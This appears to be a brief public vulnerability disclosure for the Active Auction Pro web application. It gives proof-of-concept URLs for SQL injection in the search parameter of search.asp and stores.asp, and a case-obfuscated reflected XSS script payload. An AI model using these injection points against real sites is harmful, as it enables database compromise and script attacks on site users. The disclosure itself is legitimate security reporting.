#########################################################
---------------------------------------------------------
Portal Name: Active Auction Pro
Vendor : hhttp://www.activewebsoftwares.com/P1_ActiveAuctionPro.aspx?Tabopen=1
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Aria-Security.Net
Vulnerability : (SQL/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]//search.asp?search='[SQL]&submit=%3E
http://site.com/[Path]/stores.asp?search='[SQL]&submit=Search

[XSS]:
http://site.com/[Path]/search.asp?search=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&submit=%3E